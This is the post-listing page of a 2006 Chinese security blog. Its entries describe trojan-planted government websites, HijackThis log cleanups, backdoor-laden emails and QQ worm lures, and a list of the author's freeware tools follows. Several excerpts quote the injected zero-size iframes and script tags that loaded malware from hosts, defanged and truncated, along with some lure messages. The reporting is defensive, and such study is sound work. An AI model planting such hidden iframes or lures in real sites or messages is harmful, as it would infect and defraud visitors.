- 博客(24)
- 资源 (53)
- 问答 (1)
- 收藏
- 关注
原创 [10-01]某政府和某中央企业网站被挂的木马升级了(第2版)
endurer 原创2006-10-01 第2版 补充 Kaspersky的回复。2006-09-30 第1版 上回发现这两个网站被挂上魔兽网游盗号木马。 如今网站首页被加入的代码变为:/------------<iframe height=0 width=0 src="hxxp://***object***.cnicb*.com/1**5"></iframe>--------
2006-09-30 18:05:00 5188 3
原创 又一个被挂木马的政府网站(第3版)
endurer 原创2006-09-30 第3版 补充瑞星的反应。2006-09-29 22:34:00 第2版 补充Kaspersky的回复。2006-09-29 第1版 该网站首页末被加入代码:/--------<iframe src=hxxp://www.race***swd.com.**/w***m*.htm width=0 height=0 frameborde
2006-09-29 20:57:00 3710
原创 小心传播灰鸽子的电子邮件
主 题: 要你好看 发件人: gdaaa@seed.net.tw附 件: 要你好看.exe要你好看 (见附件) 要你好看.exe 文件长度为 216,114 字节,Kaspersky 报为 Backdoor.Win32.Hupigon.bxb、Backdoor.Win32.Hupigon.cle
2006-09-28 11:34:00 2201
原创 斩了2个灰鸽子、1个木马、1个广告程序
endurer 原创2006-09-27 第1版一位网友的电脑,这两天瑞星开机扫描总报告发现 Backdoor.Gpigeon.uql。 到 http://endurer.ys168.com 下载 HijackThis 扫描log,发现如下可疑项:/-----------HijackThis_zww汉化版扫描日志 V1.99.1操作系统:Windows XP SP2 (WinNT
2006-09-27 12:46:00 1555
原创 蠕虫维金/Worm.Viking.cx正通过QQ尾巴传播
endurer 原创2006-09-26 第1版 QQ自动发送的信息为:/-------看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了? hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387***382/-------/点击该链接打开的网页(瑞星报为:Trojan.DL.VBS.A
2006-09-26 20:39:00 1989
原创 广告程序“揭发”传奇网游盗号木马等
endurer 原创2006-09-25 第1版有位网友的电脑不定期弹出广告窗口,让我帮忙检查一下。到 http://endurer.ys168.com 下载了 HijackThis 扫描 log,发现可疑项:/---------Logfile of HijackThis v1.99.1Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: In
2006-09-25 16:51:00 2010 1
原创 小心 alice 发来的带 Email-Worm.Win32.Warezov.aj 的邮件
endurer 原创2006-09-24 第1版From: "alice" <alice.thomas@goowy.com>To: endurer@163.comDate: Sat, 23 Sep 2006 17:11:50 +0800 (CST)Subject: helloMail transaction failed. Partial message is available.
2006-09-24 20:55:00 2102
原创 遭遇Trojan.PSW.Lmir.kyo、Trojan.DL.QQHelper等N多木马
endurer 原创2006-09-23 第1版有位网友的电脑经常发现病毒,手动扫描也清除不干净。让我帮忙检查一下。到 http://endurer.ys168.com 下载HijackThis扫描log,发现以下可疑项: /----------HijackThis_zww汉化版扫描日志 V1.99.1保存于 0:30:24, 日期 2006-9-19操作系统: Win
2006-09-23 18:59:00 3059
原创 遇到电脑不定期地弹广告窗口的问题
endurer 原创2006-09-22 第1版有位网友的电脑不定期地弹出广告窗口。到 http://endurer.ys168.com 下载 HijackThis 扫描log。在 log 中发现如下可疑项目:/---------Logfile of HijackThis v1.99.1Scan saved at 9:08:50, on 2006-9-22Platform: Win
2006-09-22 21:13:00 4233 1
原创 一个被挂木马的政府网站
endurer 原创2006-09-21 第1版该网站首页被加入代码:/--------<script language="JavaScript" src="hxxp://www***.zhu**jiang***q*h*.com/images/ad.js"></script>--------/ad.js 的内容为:/--------document.write("<iframe src=h
2006-09-21 21:03:00 4523
原创 遭遇盗取网络游戏帐号木马等
endurer 原创2006-09-20 第1版 有位网友的网游帐号被盗了,让我帮忙检查一下。该网友的电脑使用的是Win XP SP2,从瑞星网站下载“瑞星注册表修复工具”,发现注册表有多处被恶意修复,修复了。同时发金山毒霸的开机启动项,在开始菜单中找到金山毒霸,把病毒库升级到最新,全面查杀病毒,结果如下:/----------------C:/WINDOWS/1.com(Win3
2006-09-20 13:56:00 2463
原创 解决电脑不定期弹出广告窗口问题
endurer 原创2006-09-19 第1版有位网友的电脑不定期地弹出广告窗口。到 http://endurer.ys168.com 下载 HijackThis 扫描log。在 log 发现如下可疑项目:/---------Logfile of HijackThis v1.99.1Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: I
2006-09-19 14:05:00 2468
原创 3个网站被挂上的木马出自一家
endurer 原创2006-09-18 第1版第1个网站 首页被加入的的代码:/-------<iframe src=htxxp://www.***.why***all.com/1 width=0 height=0 frameborder=0></iframe>-------/1.htm 内容为加入多余空格的VBScript脚本代码。(瑞星报为: Trojan.DL
2006-09-18 15:20:00 1887 1
原创 魔兽网游盗号木马文件 s.exe 的一点分析
endurer 原创2006-09-17 第1版 某政府网站和某中央企业的网站被挂魔兽网游盗号木马 一文中的魔兽网游盗号木马文件 s.exe采用Borland Delphi 6.0 - 7.0开发,文件大小为:125,952 字节。采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳后,文件长度变为31,190 字节。把自身复制为:C:/Progra
2006-09-17 23:39:00 1866
原创 [09-19]关于双击*.exe就生成*~.exe(第2版)
endurer 原创2006-09-19 第2版2006-09-13 第1版有位网友的电脑出现了一个奇怪的现象,关于双击*.exe就生成*~.exe,如双击a.exe就生成a~.exe。并发来了四个文件:setup.exe、setup~.exe、Frozen Throne.exe 和 Frozen Throne~.exe。2006-09-13 22:33 2
2006-09-13 23:38:00 1931
原创 遭遇Worm.UsbSpy.a/Worm.Win32.Delf.aj
endurer 原创2006-09-12 第1版有一位朋友,他把移动硬盘接到电脑上使用,上午还正常,但下午用时则有数据保护的出错提示信息。该朋友电脑使用的是Win XP SP2,因未联网,所以不能从网上下载 HijackThis 等软件来分析。打任务管理器,发现一个名为wincfgs.exe的进程,图标为一个黄色问号,十分可疑,终止了。打开命令提示符窗口搜索文件:/--------
2006-09-12 13:09:00 1707
原创 sohu游戏也流氓?
endurer 原创2006-09-10 第1版有位网友的电脑的桌面莫名其妙地出现了名为sohu游戏的图标,到控制面板的“添加删除程序”卸载以后,下次系统启动时又出了。并发来了 HijackThis(你可以到 http://endurer.ys168.com 下载)扫描的log。在 log 发现如下可疑项目:/--------------HijackThis_zww汉化版扫描日志 V1
2006-09-11 14:53:00 4256 5
原创 免费软件 Cmd GUI Shell(图形界面的命令提示符壳)-beta3
0、目录===========1、程序基本信息2、版本更新记录3、程序界面4、开发缘由5、声明6、使用说明7、下载地址8、联系作者1、程序基本信息===========版 本:0.0.0001 beta1作 者:紫郢剑侠|Purple Endurer开发环境:MASM32 V8,Windows 2000 Professional 中文版运行环境:Windows 2000 Professio
2006-09-10 18:28:00 3627 2
原创 解决弹出www.duduw.com广告的问题
endurer 原创2006-09-08 第1版有位网友的电脑,使用IE浏览网页时老是弹出hxxp://www.duduw.com 的广告窗口。使用HijackThis(可以到 hxxp://endurer.ys168.com 下载)扫描log,发现可疑项:/-----------Logfile of HijackThis v1.99.1Scan saved at 20:20:12,
2006-09-08 21:47:00 5772
原创 遭遇灰鸽子变种、Viking 和 N多木马(第2版)
endurer 原创2006-09-08 第2版 补充杀毒软件的反应2006-09-07 第1版有位网友的电脑,总告发现Backdoor.Gpigeon.uql。于是通过QQ进行远程协助。到 http://endurer.ys168.com 下载了HijackThis 扫描log,发现如下可疑项目:/-------------------------Logfile of Hij
2006-09-07 22:05:00 2407 5
原创 传播维金/Viking蠕虫的QQ尾巴变花样了
endurer 原创2006-09-03 第1版小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r 一文中的网址变了。打开QQ好友的对话框就会自动发出的信息为:/----------我有个女同学参加2006,大学生网络风采评选,Q-Zone空间上有她参选照片,帮忙游览下给他增加人气,谢谢……hxxp://Q-Zone.QQ**
2006-09-03 23:01:00 1530
原创 Windows Live™ OneCare™中文版现身
http://safety.live.com/site/zh-cn/default.htm 对计算机进行免费的安全扫描 Windows Live OneCare 安全扫描程序属于免费服务,专为确保您的计算机安全而设计。 检查并删除病毒 清除硬盘中的垃圾内容 提高计算机性能 解决特定的计算机问题使用全面服务扫描来进行全面
2006-09-02 12:17:00 1976
原创 [09-06] 又一个下载木马的网站(第2版)
endurer 原创2006-09-06 第2版2006-09-02 第1版网站 hxxp://www.94l***m.com/ 首页会根据cookie的值打开网页:/------------hxxp://www.dudu**w.com/web/dudu*****13.htm------------/或/------------ hxxp://www.dud**uw.com/web/dudu
2006-09-02 12:15:00 1598
原创 瑞星力荐金山毒霸?原来是广告程序“作崇”
endurer 原创2006-09-01 第1版打开瑞星在线免费查毒网页,立即弹出金山毒霸的广告窗口;瑞星查完病毒,弹出扫描结果窗口时,又弹出金山毒霸的广告窗口。真的是瑞星在力荐金山毒霸吗?一位网友的电脑,电脑工作缓慢,不定期弹出广告窗口,如:/----------hxxp://cg.9e3.com/register3.htmlhxxp://photo.9158.com/tg/pi
2006-09-01 14:20:00 7175 4
用 HTML + JavaScript 打造的渐进式延迟法定退休年龄测算器
2024-09-15
免费图片浏览软件 IrfanView 64-bit 英文版
2024-06-30
MASM32编程通过WMI获取Windows用户帐户信息的控制台程序,小巧精炼,适合bat调用,重定向输出
2023-09-03
HTML+JavaScript+CSS DIY 分隔条splitter代码
2023-09-02
sysInfo(电脑系统信息)
2023-05-29
TcpStatC-增加显示PID和对应进程文件说明符
2022-08-14
TcpStatC.zip
2022-07-31
MASM32v11中的kernl32p.inc和kernl32p.lib存在bug,这是修正后的版本。
2022-07-30
MASM32v11版本中kernel32.inc和Kernel32.lib修正版。
2022-07-30
sysInfo-0_0_0001.zip
2021-11-04
Word启动故障修复程序FixWord
2017-01-16
MASM32编程实现运行时自动提示要求以管理员帐户来运行的演示源代码和exe
2017-01-05
用MASM32来DIY判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用lstrcmp,区分大小写)
2014-10-16
用MASM32来DIY一个判断字符串1是否为字符串2的子串的函数演示代码(源码+exe)(应用repe cmpsb指令,区分大小写)
2014-10-04
添加浮动按钮点击滚动到网页底部的纯JavaScript演示代码
2014-09-06
用MASM32写的 系统托盘图标管理员 TrayIconMan 0.0.0003
2012-02-17
定时关机、重启、注销、待机、修眠程序ClosePC 0.0.0.1 beta4
2011-08-04
用MASM32编写的网络时间同步/校正程序-adjTime.exe
2011-06-11
查看备份系统开/关机&用户登录/注销记录BootClos 0_0_0001_beta2
2011-05-26
BootClos 0.0.0001 beta1—查看、备份系统开关机记录
2011-05-21
DelUninstall_0_0_0001Beta4
2011-01-16
Speaker——用MASM32编写的文本朗读程序(7KB)
2010-07-24
MASM32编程通过WMI获取杀毒软件信息(源代码+exe)
2010-05-24
MASM32编程通过WMI获取Windows计划任务(源代码+EXE下载)
2010-04-19
用MASM32写的定时关机、重启、注销程序ClosePC 0.0.0.1beta1
2010-03-06
MASM32编程由WMI获取BIOS、主板、硬盘、CPU、网卡的信息(源代码+exe)
2009-10-21
FileInfo 0.0.0012
2009-10-09
DelUninstall_0_0_0001Beta3
2009-06-02
分析、获取命令行参数的MASM32演示程序
2009-04-16
IEFO_Man 0.0.0.1 beta1(映像劫持项目管理程序)
2009-03-03
MASM32编程获取任务栏高度
2008-09-21
FileInfo 0.0.0011
2008-07-17
FileInfo 0.0.0010 --修正bug,提升速度
2008-06-29
FileInfo 0.0.0009 -- 增强文件数字签名的检测
2008-06-09
FileInfo 0.0.0008
2008-05-31
Windows 10 计算器 显示的是多少?
2022-07-31
TA创建的收藏夹 TA关注的收藏夹
TA关注的人